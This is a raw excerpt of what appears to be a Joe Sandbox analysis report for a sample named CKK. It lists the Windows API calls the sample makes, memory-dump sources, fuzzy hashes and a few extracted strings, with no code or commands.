                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: Thread$CreateErrorLastResume__dosmaperr
                                          • String ID:
                                          • API String ID: 173952441-0
                                          • Opcode ID: b9713357dc2122f9a249756cdb567051a06fc89f159c10703d9309f5ddfc67f6
                                          • Instruction ID: 25677885a85a2323275547d7ea8a58aa67dfd9b2f949a518af8ae0217eabd9e0
                                          • Opcode Fuzzy Hash: b9713357dc2122f9a249756cdb567051a06fc89f159c10703d9309f5ddfc67f6
                                          • Instruction Fuzzy Hash: FF012636E8A204BBC7115BA5FC05BAA3BA9DF813B0F205219F924B20E0CB70C901C6A0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • CreateWindowExW.USER32 ref: 00E4604C
                                          • GetStockObject.GDI32 ref: 00E46060
                                          • SendMessageW.USER32(00000000,00000030,00000000), ref: 00E4606A
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: CreateMessageObjectSendStockWindow
                                          • String ID:
                                          • API String ID: 3970641297-0
                                          • Opcode ID: b5783e0ad905217875550319bbf3773a7ea60fdde8e1b1d815613e0f9b47a3e3
                                          • Instruction ID: 26ec6ad9f68e3d952e3173739283a7e85fe79b4d4a87dcdc620ab66ff31fcb3e
                                          • Opcode Fuzzy Hash: b5783e0ad905217875550319bbf3773a7ea60fdde8e1b1d815613e0f9b47a3e3
                                          • Instruction Fuzzy Hash: 7711C4B2502509BFEF224FA4EC44EEABB6DFF09395F101202FA1466010C732DC60DB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetModuleFileNameW.KERNEL32 ref: 00EA747F
                                          • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00EA7497
                                          • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 00EA74AC
                                          • RegisterTypeLibForUser.OLEAUT32 ref: 00EA74CA
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: Type$Register$FileLoadModuleNameUser
                                          • String ID:
                                          • API String ID: 1352324309-0
                                          • Opcode ID: 73cbb7f5b7c73d900c3724f7ff855f85503c0259e9532d6da9eee2723a46f5e2
                                          • Instruction ID: f7a3ad06131a26305a65de4f042a9f83841bd3fab32c458103c6da9a377d1b83
                                          • Opcode Fuzzy Hash: 73cbb7f5b7c73d900c3724f7ff855f85503c0259e9532d6da9eee2723a46f5e2
                                          • Instruction Fuzzy Hash: 6B11A1B12063119FE720CF14ED08BD27FFCEB09B44F10856AA6A6EA151D770F908DB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,00EAACD3,?,00008000), ref: 00EAB0C4
                                          • Sleep.KERNEL32(00000000), ref: 00EAB0E9
                                          • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,00EAACD3,?,00008000), ref: 00EAB0F3
                                          • Sleep.KERNEL32(00000000), ref: 00EAB126
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: CounterPerformanceQuerySleep
                                          • String ID:
                                          • API String ID: 2875609808-0
                                          • Opcode ID: db4eac699b7c557d7d5379b3c93bcba3455a4bcbd9dbe1a281a4817f4fc5f85d
                                          • Instruction ID: 333d21db13c06685dd44166d9491f9d835b7f99c6eab77e5ba312c8bdac7f1fb
                                          • Opcode Fuzzy Hash: db4eac699b7c557d7d5379b3c93bcba3455a4bcbd9dbe1a281a4817f4fc5f85d
                                          • Instruction Fuzzy Hash: 20118B30C0252DEBCF04AFE5E9A86EEBB78FF1E311F105096D981B6282CB306650CB51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00EA2DC5
                                          • GetWindowThreadProcessId.USER32(?,00000000), ref: 00EA2DD6
                                          • GetCurrentThreadId.KERNEL32 ref: 00EA2DDD
                                          • AttachThreadInput.USER32(00000000,?,00000000), ref: 00EA2DE4
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                          • String ID:
                                          • API String ID: 2710830443-0
                                          • Opcode ID: 827055fed8b2548c5a5bb4220fa5203504b6e50d5d3464af7464e30e83e3556c
                                          • Instruction ID: 81001c7a6a29458d410d2c183386fd63c018ddbca9a45d26b4b5b471622a070f
                                          • Opcode Fuzzy Hash: 827055fed8b2548c5a5bb4220fa5203504b6e50d5d3464af7464e30e83e3556c
                                          • Instruction Fuzzy Hash: F9E06D711022257BDB201B67AC0DEEB3F6CEF47FA1F10101AB606F90819AA4D884C6B0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00E59639: ExtCreatePen.GDI32 ref: 00E59693
                                            • Part of subcall function 00E59639: SelectObject.GDI32 ref: 00E596A2
                                            • Part of subcall function 00E59639: BeginPath.GDI32 ref: 00E596B9
                                            • Part of subcall function 00E59639: SelectObject.GDI32 ref: 00E596E2
                                          • MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 00ED8887
                                          • LineTo.GDI32(?,?,?), ref: 00ED8894
                                          • EndPath.GDI32 ref: 00ED88A4
                                          • StrokePath.GDI32(?), ref: 00ED88B2
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                          • String ID:
                                          • API String ID: 1539411459-0
                                          • Opcode ID: 3d0c14fd00eb59fc1fff8cdb5bcbc90c7f6c9e2ae5db48f7d6bae67647f96211
                                          • Instruction ID: 135e4c0c619938c97b6be694ba8098f23fb721e73ff772a6e48790f53c55cf30
                                          • Opcode Fuzzy Hash: 3d0c14fd00eb59fc1fff8cdb5bcbc90c7f6c9e2ae5db48f7d6bae67647f96211
                                          • Instruction Fuzzy Hash: 1CF09A36002259FADB121F95AC09FCE3B69AF06310F508002FA11710E2C7B51515DBE5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: Color$ModeObjectStockText
                                          • String ID:
                                          • API String ID: 4037423528-0
                                          • Opcode ID: b9b6f4387e5de3d0ff1cfc0aefef34a35ffebd8f815b4059762c6b01ff9f77ae
                                          • Instruction ID: d2ec47e0fc8a638f9833a677932d183443f589799a7b41c3affb7d25300d2a30
                                          • Opcode Fuzzy Hash: b9b6f4387e5de3d0ff1cfc0aefef34a35ffebd8f815b4059762c6b01ff9f77ae
                                          • Instruction Fuzzy Hash: F8E06531245251AEDF215B75BC09BD83F21EB11376F14821AF6F9640E1C3714648DB10
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: CurrentOpenProcessThreadToken
                                          • String ID:
                                          • API String ID: 3974789173-0
                                          • Opcode ID: 024cfddb878e58993d49d6bc6d1b636aa0ab3c93b2e1259137531a040df79714
                                          • Instruction ID: a0776455a6acb6ca12f7a12047889efb78c4d13742cfebd2696ccd48d49421bd
                                          • Opcode Fuzzy Hash: 024cfddb878e58993d49d6bc6d1b636aa0ab3c93b2e1259137531a040df79714
                                          • Instruction Fuzzy Hash: 4CE04F316022129FD7201BA2AE0DB463B68EF457E5F244849F245E9090E6245449C750
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetDesktopWindow.USER32 ref: 00E9D858
                                          • GetDC.USER32(00000000), ref: 00E9D862
                                          • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00E9D882
                                          • ReleaseDC.USER32(?), ref: 00E9D8A3
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: CapsDesktopDeviceReleaseWindow
                                          • String ID:
                                          • API String ID: 2889604237-0
                                          • Opcode ID: 0ba61739e30bf54ddca0fd94e7f75f8560201a895a6ea3eb94bbaaadebc57e12
                                          • Instruction ID: ba4352ae397a10076e9d6489bbf4645241e754a13a9961ca606127c2e1bf5a3b
                                          • Opcode Fuzzy Hash: 0ba61739e30bf54ddca0fd94e7f75f8560201a895a6ea3eb94bbaaadebc57e12
                                          • Instruction Fuzzy Hash: 26E01AB0805206DFCF519FA1EC0866DBBF2FB08751F28A40AE816F7250C738890AEF40
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetDesktopWindow.USER32 ref: 00E9D86C
                                          • GetDC.USER32(00000000), ref: 00E9D876
                                          • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00E9D882
                                          • ReleaseDC.USER32(?), ref: 00E9D8A3
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: CapsDesktopDeviceReleaseWindow
                                          • String ID:
                                          • API String ID: 2889604237-0
                                          • Opcode ID: 30260d566edd4a357adb12f796ef747985aa59350e96cf38c2f9f74232d18c27
                                          • Instruction ID: b75b238e1c4f6b84fc62bbbfc64e731d555d32cb06f5444c90130940517ea50b
                                          • Opcode Fuzzy Hash: 30260d566edd4a357adb12f796ef747985aa59350e96cf38c2f9f74232d18c27
                                          • Instruction Fuzzy Hash: 58E01A70801201DFCB509FA1E80866DBBF1FB08751B28940AE816F7250C738990ADF40
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00E47620: _wcslen.LIBCMT ref: 00E47625
                                          • WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 00EB4ED4
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: Connection_wcslen
                                          • String ID: *$LPT
                                          • API String ID: 1725874428-3443410124
                                          • Opcode ID: a65b79be135a615da97c76e8b8430cd9da335fd9c41bf773d2a3d30ab4d4d514
                                          • Instruction ID: cfd71b008700ca13c39de1f7ec06447231271cfcd75a61f94c1e6ed5c412b3f2
                                          • Opcode Fuzzy Hash: a65b79be135a615da97c76e8b8430cd9da335fd9c41bf773d2a3d30ab4d4d514
                                          • Instruction Fuzzy Hash: F69142B5A002149FCB14DF54C484EEABBF5BF44308F19A099E84AAF3A2D735ED45CB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • __startOneArgErrorHandling.LIBCMT ref: 00E6E30D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: ErrorHandling__start
                                          • String ID: pow
                                          • API String ID: 3213639722-2276729525
                                          • Opcode ID: 0e9a6a809e343a3e576b98a7430d99e2fc954301ad1a78fe3f0644f21c9dbb12
                                          • Instruction ID: f9bb4e9889ae3215ea856af48b9e51222afadd59f3abe0f9cefab0bd3f86cf17
                                          • Opcode Fuzzy Hash: 0e9a6a809e343a3e576b98a7430d99e2fc954301ad1a78fe3f0644f21c9dbb12
                                          • Instruction Fuzzy Hash: F6518065A8C20696CB257B14D9413BA3BD8EB407C4F30F95CF0D9B63E9DF308C959A86
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: #
                                          • API String ID: 0-1885708031
                                          • Opcode ID: 0c705a103237629ae7ba233f1e0e1fa303b508dfe717039fece017e0011277ec
                                          • Instruction ID: 0e346a94bc2b67c75d30021fad6849d385f60df6463aa7d8f3a7ec1488813c65
                                          • Opcode Fuzzy Hash: 0c705a103237629ae7ba233f1e0e1fa303b508dfe717039fece017e0011277ec
                                          • Instruction Fuzzy Hash: CC511F35904206DEDF18DFA8C0816FA7BA8EF15314F246856ED91BB390D6309E86CBA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • Sleep.KERNEL32(00000000), ref: 00E5F2A2
                                          • GlobalMemoryStatusEx.KERNEL32 ref: 00E5F2BB
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: GlobalMemorySleepStatus
                                          • String ID: @
                                          • API String ID: 2783356886-2766056989
                                          • Opcode ID: 7316116f2896bb166389c4025699dd7109cf37f7fafd2711b49f87fe079c5a4b
                                          • Instruction ID: 7947a6dcedf0b2a909d11ce490598b4a3831c176922d1363f96648b27449fee2
                                          • Opcode Fuzzy Hash: 7316116f2896bb166389c4025699dd7109cf37f7fafd2711b49f87fe079c5a4b
                                          • Instruction Fuzzy Hash: C85156715097489BD320AF51EC86BABBBF8FF84300F91884DF1D9611A5EB318529CB67
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: BuffCharUpper_wcslen
                                          • String ID: CALLARGARRAY
                                          • API String ID: 157775604-1150593374
                                          • Opcode ID: 6a51a14cda3d83a9150e44fd0466cd1ea2ba03c0eeb27d516854c3c49b1bc853
                                          • Instruction ID: aa31f90762ecf853725af5829bd9ab4627bae54f905d97feefe91c543d45f42f
                                          • Opcode Fuzzy Hash: 6a51a14cda3d83a9150e44fd0466cd1ea2ba03c0eeb27d516854c3c49b1bc853
                                          • Instruction Fuzzy Hash: 75417F32A002059FCB18DFA8C982DAEBBF5EF59354B14606DF515B7251D731AD82CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • _wcslen.LIBCMT ref: 00EBD130
                                          • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00EBD13A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: CrackInternet_wcslen
                                          • String ID: |
                                          • API String ID: 596671847-2343686810
                                          • Opcode ID: ef46ab4ea963801ed14de2f674b7167030f31a1179d0624f9095edb15f572459
                                          • Instruction ID: 9e29d86a8b50da7e2d28df3774bd56f4ca26776f58f60cb4ed09fb040e8e1ecc
                                          • Opcode Fuzzy Hash: ef46ab4ea963801ed14de2f674b7167030f31a1179d0624f9095edb15f572459
                                          • Instruction Fuzzy Hash: A3311871D01219ABCF15EFA4DC85AEFBFB9FF09344F101019E815B6162EB31AA06DB61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • DestroyWindow.USER32 ref: 00ED3621
                                          • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 00ED365C
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: Window$DestroyMove
                                          • String ID: static
                                          • API String ID: 2139405536-2160076837
                                          • Opcode ID: 807c07caa2d3dbeb5fd1b7fd2075087ea70f0acd2924410163ed75121b879821
                                          • Instruction ID: bd377ffa44ca0ae24d931270e5e5e9c1b6c95a989c953e7171f96a4c0e9f34b7
                                          • Opcode Fuzzy Hash: 807c07caa2d3dbeb5fd1b7fd2075087ea70f0acd2924410163ed75121b879821
                                          • Instruction Fuzzy Hash: AA319071110604AEDB20DF38DC41EFB73A9FF48764F10A61AF9A5A7280DA31ED82D761
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00ED461F
                                          • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00ED4634
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: MessageSend
                                          • String ID: '
                                          • API String ID: 3850602802-1997036262
                                          • Opcode ID: eaab1231e63d7d4fba61b9f057d594300d7f5743eef435ae8789e7331dd9fe24
                                          • Instruction ID: 3acbf01f238a222087ab89312cbe3ce6d97a111fefc7a8f45f4aeb2453246b23
                                          • Opcode Fuzzy Hash: eaab1231e63d7d4fba61b9f057d594300d7f5743eef435ae8789e7331dd9fe24
                                          • Instruction Fuzzy Hash: 9D3136B4A0120A9FDF14CFA9D981BDABBB5FF19304F14506AE915AB381D770E942CF90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00ED327C
                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00ED3287
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: MessageSend
                                          • String ID: Combobox
                                          • API String ID: 3850602802-2096851135
                                          • Opcode ID: 97df0d6d33b01a9c9c96153b6388d6b977e2a9ba987de7522c82473feacf9526
                                          • Instruction ID: bc2a86d4a7ce17867ffd0ce45cd9b9d21114241a04bf824fa4a1e5f3cf0fd0d3
                                          • Opcode Fuzzy Hash: 97df0d6d33b01a9c9c96153b6388d6b977e2a9ba987de7522c82473feacf9526
                                          • Instruction Fuzzy Hash: B611E6717002087FEF219E64DC80EBB375BEB54368F105126F514A73A0D631DD529761
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
